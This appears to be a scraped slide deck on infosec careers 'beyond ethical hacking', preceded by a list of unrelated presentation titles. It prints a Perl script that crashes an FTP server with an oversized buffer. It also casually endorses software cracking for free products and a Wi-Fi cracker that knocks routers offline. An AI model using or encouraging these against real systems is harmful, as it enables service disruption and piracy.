Unit-IV; Professional Sales Representative (PSR).pptx
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and Modifications
 
ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan Fellows
 
Asian American Pacific Islander Month DDSD 2024.pptx
Asian American Pacific Islander Month DDSD 2024.pptxAsian American Pacific Islander Month DDSD 2024.pptx
Asian American Pacific Islander Month DDSD 2024.pptx
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxpsychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docx
 
PROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docxPROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docx
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Spatium Project Simulation student brief
Spatium Project Simulation student briefSpatium Project Simulation student brief
Spatium Project Simulation student brief
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)
 
Food safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdfFood safety_Challenges food safety laboratories_.pdf
Food safety_Challenges food safety laboratories_.pdf
 

Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

  • 1. Life Beyond Ethical Hacking “ The Actual Information Security” By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )
  • 2. Acknowledgements Dr. H.S Johal Ms. Himanshi
  • 3. Lil About My Self  Certified With C|EH , CISE , AFCEH  Associated With over 9 Companies  Ambassador , EC-COUNCIL  Creator Of India’s Fist DLP on Web Application Penetration Testing Course  Student @ LPU   Tested Over 90+ Servers  Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
  • 4. Lets Go Old School ,What is Ethical Hacking?  Breaking Into Devices , Networks Legally.  Securing Servers, Recovering  Emails etc.  But the Question Remains !  Where to get these jobs ?
  • 6. Why More Jobs and Less People ?  Emerging Technology  Still Register Work  Don’t want to spend money  Find it too difficult  People Feel they can learn hacking in 2 days workshop :-P  No Proper facilities of required courses
  • 7. Salary Packages  Normal B.tech : 300K-400K  BPO : 100K-250K  DEVELOPMENT : 300K-700K  SECURITY : 600K-1300K
  • 8. Beyond So Called “Ethical Hacking”  Web Application Penetration testing  Exploit Writing  Reverse Engineering  Malware Analysis  Computer Forensics  Protocol Analysis
  • 9. Why To Go Beyond Ethical Hacking?  Jobs For Ethical Hacker:-  Trainer  Trainer  Trainer  Trainer  And Trainer  Salary Around : 15K + Incentives
  • 10. Jobs Beyond Ethical Hacking:-  Jobs For Hackers:-  Researchers  Technical Heads  Penetration testers  Forensic Investigators  Salary Around: 300-400K Per  Month 
  • 11. Benefits  of not Being a Hacker
  • 12. Benefits  of Being a Hacker I M UR WORST NIGHTMARE :-P
  • 13. How To Let Your Dreams Come True?  Some Highly Paid Fields :-  WAPT – Involves Testing of Web Applications , Websites , Servers , Source code Auditing .  Exploit Writing – Finding Vulnerabilities in soft wares and Possibly to Exploit the Software .  Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product
  • 14. How To Let Your Dreams Come True?  Some Highly Paid Fields :-  Wireless Testing :- Involves Network Security infrastructure build up , Managing Networks , System Administration etc.  Projects :- Good At Coding? Show to the whole world .  Forensics : Highest Paid Job in the entire list  Takes A lot , And Pays A lot
  • 15. Why We Need More People ? Source: Indian Express
  • 16. Why We Need More People ? Source: Times Of India
  • 17. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Source: SoftPedia
  • 18. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd.. Source: Private
  • 19. Norton India Hacked !! Source: Private
  • 20. Norton India’s Database Hacked !! Source: Private
  • 21. Norton India’s Database Hacked !! Source: Private
  • 22. The Biggest Of All… Anonymous!! Source: National Post
  • 23. Now Beyond The Word ‘Ethical’ Web Application Penetration Testing :- • Find Bugs In Web Applications – Custom Made , Open Source Applications . • Bugs which may compromise the security , make it vulnerable , helps an attacker to steal sensitive information • Now How To Perform 1 Out of 300 Tests In Web Applications Pen- Test? • Lets See a Simple Example – SQL Injection Bypass
  • 24. Rise Of The Web Applications
  • 25. Fasten Your Seat Belts , Its Showtime DEMO
  • 26. Now Beyond The Word ‘Ethical’ Exploit Writing • Potentially writing codes to exploit a vulnerability . • Highly Paid in Soft wares are vulnerable to Exploits , which further may lead to compromise of the entire system. • Requirement : C,C++, Perl , Python , Ruby , Assembly language
  • 27. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Server use strict; use Socket; my $junk = "x41" x1000; my $host = shift || ‘192.168.15.1'; my $port = shift || 200; my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($host); my $paddr = sockaddr_in($port, $iaddr); print "[+] Setting up socketn"; socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; print "[+] Connecting to $host on port $portn"; connect(SOCKET, $paddr) or die "connect: $!"; print "[+] Sending payloadn"; print SOCKET $junk."n"; print "[+] Payload sentn"; close SOCKET or die "close: $!";
  • 28. Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Server use strict; use Socket; my $junk = "x41" x1000; my $host = shift || ‘192.168.15.1'; my $port = shift || 200; my $proto = getprotobyname('tcp'); my $iaddr = inet_aton($host); my $paddr = sockaddr_in($port, $iaddr); print "[+] Setting up socketn"; socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; print "[+] Connecting to $host on port $portn"; connect(SOCKET, $paddr) or die "connect: $!"; print "[+] Sending payloadn"; print SOCKET $junk."n"; print "[+] Payload sentn"; close SOCKET or die "close: $!";
  • 29. Now Beyond The Word ‘Ethical’ Prices for Various Exploits
  • 30. Now Beyond The Word ‘Ethical’ Reverse Engineering • Editing the final software to find serials keys , stop the online authentications , • Mostly used by pirates • Sometimes used to edit the features of a final software • Make your Life easier with free products 
  • 31. Now Beyond The Word ‘Ethical’ Wireless Penetration Testing • Involves Auditing of Network Security Over Wireless • Installation of Servers And Security Devices • Crack proofing Wireless Passwords • Highly paid • Requires Networking Background
  • 32. INSANITY WIFI CRACKER Insanity Wi-fi Cracker • Developed By me and my Friends for minor project • Automates the cracking of various wifi securities • Performs self MITM attack • DOS Service Can Crash the Routers For Ever :-P • Even an 8 Years old can press the button ‘c’ for cracking and no. for a particular AP to crack
  • 33. Wi-fi Cracking At a Click Of a Button DEMO
  • 34. So A One Last Question , Wanna go this ?
  • 35. Or Wanna Go This ?
  • 36. After All It’s your Career |Handle it with care|